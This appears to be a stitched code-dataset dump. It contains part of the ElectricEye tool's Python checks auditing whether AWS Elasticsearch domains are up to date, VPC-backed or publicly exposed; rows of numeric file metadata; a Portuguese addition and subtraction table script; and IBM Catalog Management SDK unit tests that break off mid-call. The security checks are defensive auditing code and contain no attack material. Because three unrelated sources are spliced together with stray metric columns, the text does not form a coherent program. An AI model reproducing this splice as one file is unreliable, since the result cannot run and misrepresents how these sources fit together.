            # Domain software is current -> informational, resolved finding
            severityLabel = "INFORMATIONAL"
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " is up to date. Service provided message follows: "
                + updateInformation
            )
        # Single finding skeleton; only the branch-dependent fields above vary
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": domainArn + "/elasticsearch-version-update-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": domainArn,
            "AwsAccountId": awsAccountId,
            "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[Elasticsearch.7] Elasticsearch Service domains should be updated to the latest service software version",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For update information refer to the Service Software Updates section of the Amazon Elasticsearch Service Developer Guide",
                    "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-service-software",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsElasticSearchDomain",
                    "Id": domainArn,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {
                        "AwsElasticSearchDomain": {
                            "DomainId": domainId,
                            "DomainName": esDomainName,
                            "ElasticsearchVersion": esVersion,
                        }
                    },
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.MA-1",
                    "NIST SP 800-53 MA-2",
                    "NIST SP 800-53 MA-3",
                    "NIST SP 800-53 MA-5",
                    "NIST SP 800-53 MA-6",
                    "AICPA TSC CC8.1",
                    "ISO 27001:2013 A.11.1.2",
                    "ISO 27001:2013 A.11.2.4",
                    "ISO 27001:2013 A.11.2.5",
                    "ISO 27001:2013 A.11.2.6",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("es")
def elasticsearch_in_vpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.8] Elasticsearch Service domains should be in a VPC

    Yields one Security Hub finding per domain: FAILED/HIGH when the domain has
    no VPC configuration (public endpoint), PASSED/INFORMATIONAL when it is
    VPC-backed.

    Bug fix: the VPC lookup previously read ``info["VPCOptions"]["VPCId"]``
    where ``info`` is an undefined name; the resulting NameError was swallowed
    by a bare ``except``, so EVERY domain was reported as "NO_VPC" (a failing
    finding). The lookup now uses the DescribeElasticsearchDomain response and
    only falls back when VPCOptions is genuinely absent.
    """
    for domain in list_domain_names(cache)["DomainNames"]:
        esDomainName = str(domain["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        domainStatus = response["DomainStatus"]
        esVersion = str(domainStatus["ElasticsearchVersion"])
        domainId = str(domainStatus["DomainId"])
        domainArn = str(domainStatus["ARN"])
        # FIX: read from the describe response (was the undefined name `info`);
        # narrow the except so unrelated errors are no longer hidden
        try:
            vpcId = str(domainStatus["VPCOptions"]["VPCId"])
        except KeyError:
            # Public-endpoint domains carry no VPCOptions block in the response
            vpcId = "NO_VPC"
        # ISO 8601 timestamp shared by all of the finding's date fields
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if vpcId == "NO_VPC":
            # Failing finding: the domain is reachable outside a VPC
            severityLabel = "HIGH"
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " is not in a VPC, Placing an Amazon ES domain within a VPC enables secure communication between Amazon ES and other services within the VPC without the need for an internet gateway, NAT device, or VPN connection. All traffic remains securely within the AWS Cloud. Because of their logical isolation, domains that reside within a VPC have an extra layer of security when compared to domains that use public endpoints. Refer to the remediation instructions if this configuration is not intended."
            )
        else:
            severityLabel = "INFORMATIONAL"
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
            description = (
                "Elasticsearch Service domain " + esDomainName + " is in a VPC."
            )
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": domainArn + "/elasticsearch-in-vpc-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": domainArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure"
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[Elasticsearch.8] Elasticsearch Service domains should be in a VPC",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For information on placing Domains in a VPC refer to the Launching your Amazon Elasticsearch Service domains using a VPC section of the Amazon Elasticsearch Service Developer Guide",
                    "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html"
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsElasticSearchDomain",
                    "Id": domainArn,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {
                        "AwsElasticSearchDomain": {
                            "DomainId": domainId,
                            "DomainName": esDomainName,
                            "ElasticsearchVersion": esVersion
                        }
                    }
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.AC-3",
                    "NIST SP 800-53 AC-1",
                    "NIST SP 800-53 AC-17",
                    "NIST SP 800-53 AC-19",
                    "NIST SP 800-53 AC-20",
                    "NIST SP 800-53 SC-15",
                    "AICPA TSC CC6.6",
                    "ISO 27001:2013 A.6.2.1",
                    "ISO 27001:2013 A.6.2.2",
                    "ISO 27001:2013 A.11.2.6",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.2.1",
                ]
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState
        }
@registry.register_check("es")
def elasticsearch_public_access_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[Elasticsearch.9] Elasticsearch Service domains should not be exposed to the public

    A domain is considered fully public when all three hold: its resource
    policy grants the anonymous ("*") principal with no Condition attached,
    it is not inside a VPC, and Cognito authentication is disabled.

    Fixes relative to the original implementation:
    - VPC and access-policy lookups read from the describe response (they
      previously referenced the undefined name ``info`` whose NameError was
      swallowed by bare ``except`` clauses, so the check could never fail).
    - Anonymous access is detected if ANY Allow statement grants it
      (previously only the last statement's verdict survived the loop), and
      both the string "*" and {"AWS": "*"} Principal forms are matched
      (``str()`` of a parsed dict uses single quotes, so the old string
      comparison could never match).
    - The passing finding is INFORMATIONAL (it was CRITICAL, a copy/paste
      slip — every sibling check uses INFORMATIONAL for PASSED) and its
      description reads "is not exposed to the public".
    """
    for domain in list_domain_names(cache)["DomainNames"]:
        esDomainName = str(domain["DomainName"])
        response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
        domainStatus = response["DomainStatus"]
        esVersion = str(domainStatus["ElasticsearchVersion"])
        domainId = str(domainStatus["DomainId"])
        domainArn = str(domainStatus["ARN"])
        # Determine if the domain has Cognito authentication enabled
        try:
            cognitoEnabledCheck = str(domainStatus["CognitoOptions"]["Enabled"])
        except KeyError:
            cognitoEnabledCheck = "False"
        # Determine if the domain lives in a VPC (FIX: was the undefined `info`)
        try:
            vpcId = str(domainStatus["VPCOptions"]["VPCId"])
        except KeyError:
            vpcId = "NO_VPC"
        # Parse the resource policy: anonymous access means an Allow statement
        # for the "*" principal with no Condition to narrow it down
        policyAllowAnon = "NO_POLICY"
        try:
            policyDoc = domainStatus["AccessPolicies"]
            policyJson = json.loads(policyDoc.encode().decode("unicode_escape"))
            policyAllowAnon = "False"
            for sid in policyJson["Statement"]:
                # Deny statements and conditioned statements do not open the domain
                if sid.get("Effect") != "Allow" or "Condition" in sid:
                    continue
                principal = sid.get("Principal")
                # Principal may be the bare string "*" or {"AWS": "*"} / {"AWS": ["*"]}
                anonPrincipal = principal == "*" or (
                    isinstance(principal, dict)
                    and principal.get("AWS") in ("*", ["*"])
                )
                if anonPrincipal:
                    policyAllowAnon = "True"
                    break
        except (KeyError, TypeError, ValueError):
            # No policy attached (or unparseable) -> nothing grants anonymous access
            policyAllowAnon = "NO_POLICY"
        # Fully public only when no layer (policy condition, VPC, Cognito) restricts access
        fullPublic = (
            policyAllowAnon == "True"
            and vpcId == "NO_VPC"
            and cognitoEnabledCheck == "False"
        )
        # ISO 8601 timestamp shared by all of the finding's date fields
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        if fullPublic:
            severityLabel = "CRITICAL"
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " is open to public due to not using a VPC, Cognito, or any additional conditions within the resource policy. Public access will allow malicious actors to attack the confidentiality, integrity or availability of documents indexed in your Domain. Refer to the remediation instructions if this configuration is not intended."
            )
        else:
            # FIX: passing findings are informational, not CRITICAL
            severityLabel = "INFORMATIONAL"
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
            description = (
                "Elasticsearch Service domain "
                + esDomainName
                + " is not exposed to the public due to using a VPC, Cognito, or any additional conditions within the resource policy."
            )
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": domainArn + "/elasticsearch-public-access-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": domainArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure"
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[Elasticsearch.9] Elasticsearch Service domains should not be exposed to the public",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For information on protecting Domains with a Resource-based Policy refer to the Identity and Access Management in Amazon Elasticsearch Service section of the Amazon Elasticsearch Service Developer Guide",
                    "Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-ac.html"
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsElasticSearchDomain",
                    "Id": domainArn,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {
                        "AwsElasticSearchDomain": {
                            "DomainId": domainId,
                            "DomainName": esDomainName,
                            "ElasticsearchVersion": esVersion
                        }
                    }
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.AC-3",
                    "NIST SP 800-53 AC-1",
                    "NIST SP 800-53 AC-17",
                    "NIST SP 800-53 AC-19",
                    "NIST SP 800-53 AC-20",
                    "NIST SP 800-53 SC-15",
                    "AICPA TSC CC6.6",
                    "ISO 27001:2013 A.6.2.1",
                    "ISO 27001:2013 A.6.2.2",
                    "ISO 27001:2013 A.11.2.6",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.2.1",
                ]
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState
        }
| 50.716186
| 514
| 0.475889
| 5,337
| 68,619
| 6.103054
| 0.078134
| 0.015842
| 0.023763
| 0.029043
| 0.906883
| 0.904673
| 0.903567
| 0.902769
| 0.897397
| 0.896383
| 0
| 0.053582
| 0.422041
| 68,619
| 1,353
| 515
| 50.716186
| 0.76772
| 0.030137
| 0
| 0.811437
| 0
| 0.032458
| 0.394867
| 0.051254
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007728
| false
| 0.007728
| 0.002318
| 0
| 0.011592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
273c29c64b4097e4e5beba39fb76750895e2985e
| 5,525
|
py
|
Python
|
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
tab/tab1.py
|
Mariaalice1/tabuada
|
acfa5c8ce07048d77f37a168818e80c7d77c208b
|
[
"MIT"
] | null | null | null |
# Soma / Subtracao: addition and subtraction tables for 1..10 against 1..4.
# Rewritten from ~250 hand-unrolled single-element lists and loops into three
# nested loops. Also fixes the original bug where the subtraction section
# reused the leftover `tabb = [1+1]` value and printed "1-1 = 2" instead of
# "1-1 = 0".

# Separator printed between blocks, and the closing banner printed last —
# byte-for-byte the strings the original script emitted.
SEPARATOR = "----------------------------------------------"
CLOSING = "---------------------- Fim ------------------------"


def tabuada_lines(max_left=10, max_right=4):
    """Build every output line of the table, in print order.

    Generalizes the original hard-coded script via parameters whose defaults
    reproduce the original output exactly (modulo the 1-1 fix).

    Args:
        max_left: largest left operand per block (the original used 10).
        max_right: largest right operand per operation (the original used 4).

    Returns:
        list[str]: "a+b = c" then "a-b = c" lines, with SEPARATOR appended
        after each block of ``max_left`` lines and CLOSING as the final line.
    """
    operations = (("+", lambda a, b: a + b), ("-", lambda a, b: a - b))
    lines = []
    for op_index, (symbol, combine) in enumerate(operations):
        for right in range(1, max_right + 1):
            for left in range(1, max_left + 1):
                lines.append("{}{}{} = {}".format(left, symbol, right, combine(left, right)))
            # The very last block ends with the "Fim" banner instead of a separator
            is_last_block = op_index == len(operations) - 1 and right == max_right
            lines.append(CLOSING if is_last_block else SEPARATOR)
    return lines


# Preserve the original script behavior: print the whole table on execution.
for _line in tabuada_lines():
    print(_line)
| 20.92803
| 65
| 0.475294
| 1,120
| 5,525
| 2.208929
| 0.025893
| 0.157639
| 0.019402
| 0.03557
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0.991108
| 0
| 0.115706
| 0.220995
| 5,525
| 264
| 65
| 20.92803
| 0.459108
| 0.002353
| 0
| 0.352227
| 0
| 0
| 0.185266
| 0.066776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.356275
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
27885e6257246f018fdf1b7e5d1d1ae44fba5709
| 505,670
|
py
|
Python
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 10
|
2020-04-02T15:48:33.000Z
|
2021-06-23T05:12:49.000Z
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 151
|
2020-03-30T20:24:39.000Z
|
2022-03-30T16:51:22.000Z
|
test/unit/test_catalog_management_v1.py
|
JonahFarc/platform-services-python-sdk
|
f5cee0d629ce81048680e19c81cea8448ecab217
|
[
"Apache-2.0"
] | 25
|
2020-04-16T21:03:19.000Z
|
2021-12-13T19:37:39.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2021.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit Tests for CatalogManagementV1
"""
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
from ibm_cloud_sdk_core.utils import datetime_to_string, string_to_datetime
import inspect
import json
import pytest
import re
import requests
import responses
import urllib
from ibm_platform_services.catalog_management_v1 import *
# Shared service client used by every test class below.  NoAuthAuthenticator
# skips real IAM authentication so the mocked HTTP layer is all that runs.
_service = CatalogManagementV1(
    authenticator=NoAuthAuthenticator()
)

# Base URL every test registers its mock endpoints under.
_base_url = 'https://cm.globalcatalog.cloud.ibm.com/api/v1-beta'
_service.set_service_url(_base_url)
##############################################################################
# Start of Service: Account
##############################################################################
# region
class TestGetCatalogAccount():
    """
    Test Class for get_catalog_account
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are matched through a compiled
        # pattern so the mock tolerates any number of trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_catalog_account_all_params(self):
        """
        get_catalog_account()
        """
        # Register the mocked GET /catalogaccount endpoint.
        mock_response = '{"id": "id", "hide_IBM_cloud_catalog": true, "account_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}'
        responses.add(
            responses.GET,
            self.preprocess_url(_base_url + '/catalogaccount'),
            body=mock_response,
            content_type='application/json',
            status=200,
        )

        # Invoke the operation.
        response = _service.get_catalog_account()

        # Exactly one HTTP call must have been made, answered with 200.
        assert len(responses.calls) == 1
        assert response.status_code == 200
class TestUpdateCatalogAccount():
    """
    Test Class for update_catalog_account
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs with trailing slashes are matched via a compiled pattern so
        # the mock tolerates any number of trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_update_catalog_account_all_params(self):
        """
        update_catalog_account()
        """
        # Set up mock: PUT /catalogaccount returns an empty 200.
        url = self.preprocess_url(_base_url + '/catalogaccount')
        responses.add(responses.PUT,
                      url,
                      status=200)

        # Construct a dict representation of a FilterTerms model
        filter_terms_model = {}
        filter_terms_model['filter_terms'] = ['testString']

        # Construct a dict representation of a IDFilter model
        id_filter_model = {}
        id_filter_model['include'] = filter_terms_model
        id_filter_model['exclude'] = filter_terms_model

        # Construct a dict representation of a Filters model.
        # category_filters is deliberately empty here; the request-body
        # assertion below compares against this exact dict.
        # (An unused CategoryFilter model that was never wired into the
        # request has been removed.)
        filters_model = {}
        filters_model['include_all'] = True
        filters_model['category_filters'] = {}
        filters_model['id_filters'] = id_filter_model

        # Set up parameter values
        id = 'testString'
        hide_ibm_cloud_catalog = True
        account_filters = filters_model

        # Invoke method
        response = _service.update_catalog_account(
            id=id,
            hide_ibm_cloud_catalog=hide_ibm_cloud_catalog,
            account_filters=account_filters,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params: the serialized request body must carry the
        # exact values passed to the operation.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['hide_IBM_cloud_catalog'] == True
        assert req_body['account_filters'] == filters_model

    @responses.activate
    def test_update_catalog_account_required_params(self):
        """
        test_update_catalog_account_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogaccount')
        responses.add(responses.PUT,
                      url,
                      status=200)

        # Invoke method with no optional parameters at all.
        response = _service.update_catalog_account()

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200
class TestGetCatalogAccountAudit():
    """
    Test Class for get_catalog_account_audit
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # Match URLs with trailing slashes leniently via a compiled pattern.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_catalog_account_audit_all_params(self):
        """
        get_catalog_account_audit()
        """
        # Register the mocked GET /catalogaccount/audit endpoint.
        mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
        responses.add(
            responses.GET,
            self.preprocess_url(_base_url + '/catalogaccount/audit'),
            body=mock_response,
            content_type='application/json',
            status=200,
        )

        # Invoke the operation and verify one successful HTTP round trip.
        response = _service.get_catalog_account_audit()
        assert len(responses.calls) == 1
        assert response.status_code == 200
class TestGetCatalogAccountFilters():
    """
    Test Class for get_catalog_account_filters
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in slashes are converted to a regex so the mock matches
        # regardless of how many trailing slashes the client appends.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_catalog_account_filters_all_params(self):
        """
        get_catalog_account_filters()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogaccount/filters')
        mock_response = '{"account_filters": [{"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}], "catalog_filters": [{"catalog": {"id": "id", "name": "name"}, "filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog = 'testString'

        # Invoke method with the optional catalog query parameter.
        response = _service.get_catalog_account_filters(
            catalog=catalog,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params: the catalog value must appear in the
        # percent-decoded query string of the outgoing request.
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'catalog={}'.format(catalog) in query_string

    @responses.activate
    def test_get_catalog_account_filters_required_params(self):
        """
        test_get_catalog_account_filters_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogaccount/filters')
        mock_response = '{"account_filters": [{"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}], "catalog_filters": [{"catalog": {"id": "id", "name": "name"}, "filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Invoke method without the optional catalog filter.
        response = _service.get_catalog_account_filters()

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200
# endregion
##############################################################################
# End of Service: Account
##############################################################################
##############################################################################
# Start of Service: Catalogs
##############################################################################
# region
class TestListCatalogs():
    """
    Test Class for list_catalogs
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in slashes are converted to a regex so the mock matches
        # regardless of how many trailing slashes the client appends.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_list_catalogs_all_params(self):
        """
        list_catalogs()
        """
        # Set up mock: GET /catalogs returns a paginated catalog listing.
        url = self.preprocess_url(_base_url + '/catalogs')
        mock_response = '{"total_count": 11, "resources": [{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Invoke method (list_catalogs takes no required parameters).
        response = _service.list_catalogs()

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200
class TestCreateCatalog():
    """
    Test Class for create_catalog
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in slashes are converted to a regex so the mock matches
        # regardless of how many trailing slashes the client appends.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_create_catalog_all_params(self):
        """
        create_catalog()
        """
        # Set up mock: POST /catalogs returns the created catalog (201).
        url = self.preprocess_url(_base_url + '/catalogs')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Construct a dict representation of a Feature model
        feature_model = {}
        feature_model['title'] = 'testString'
        feature_model['description'] = 'testString'

        # Construct a dict representation of a FilterTerms model
        filter_terms_model = {}
        filter_terms_model['filter_terms'] = ['testString']

        # Construct a dict representation of a CategoryFilter model
        # NOTE(review): this model is never wired into filters_model below
        # (category_filters is set to {}) — looks like generated dead code.
        category_filter_model = {}
        category_filter_model['include'] = True
        category_filter_model['filter'] = filter_terms_model

        # Construct a dict representation of a IDFilter model
        id_filter_model = {}
        id_filter_model['include'] = filter_terms_model
        id_filter_model['exclude'] = filter_terms_model

        # Construct a dict representation of a Filters model
        filters_model = {}
        filters_model['include_all'] = True
        filters_model['category_filters'] = {}
        filters_model['id_filters'] = id_filter_model

        # Construct a dict representation of a SyndicationCluster model
        syndication_cluster_model = {}
        syndication_cluster_model['region'] = 'testString'
        syndication_cluster_model['id'] = 'testString'
        syndication_cluster_model['name'] = 'testString'
        syndication_cluster_model['resource_group_name'] = 'testString'
        syndication_cluster_model['type'] = 'testString'
        syndication_cluster_model['namespaces'] = ['testString']
        syndication_cluster_model['all_namespaces'] = True

        # Construct a dict representation of a SyndicationHistory model
        syndication_history_model = {}
        syndication_history_model['namespaces'] = ['testString']
        syndication_history_model['clusters'] = [syndication_cluster_model]
        syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"

        # Construct a dict representation of a SyndicationAuthorization model
        syndication_authorization_model = {}
        syndication_authorization_model['token'] = 'testString'
        syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"

        # Construct a dict representation of a SyndicationResource model
        syndication_resource_model = {}
        syndication_resource_model['remove_related_components'] = True
        syndication_resource_model['clusters'] = [syndication_cluster_model]
        syndication_resource_model['history'] = syndication_history_model
        syndication_resource_model['authorization'] = syndication_authorization_model

        # Set up parameter values
        id = 'testString'
        rev = 'testString'
        label = 'testString'
        short_description = 'testString'
        catalog_icon_url = 'testString'
        tags = ['testString']
        features = [feature_model]
        disabled = True
        resource_group_id = 'testString'
        owning_account = 'testString'
        catalog_filters = filters_model
        syndication_settings = syndication_resource_model
        kind = 'testString'

        # Invoke method
        response = _service.create_catalog(
            id=id,
            rev=rev,
            label=label,
            short_description=short_description,
            catalog_icon_url=catalog_icon_url,
            tags=tags,
            features=features,
            disabled=disabled,
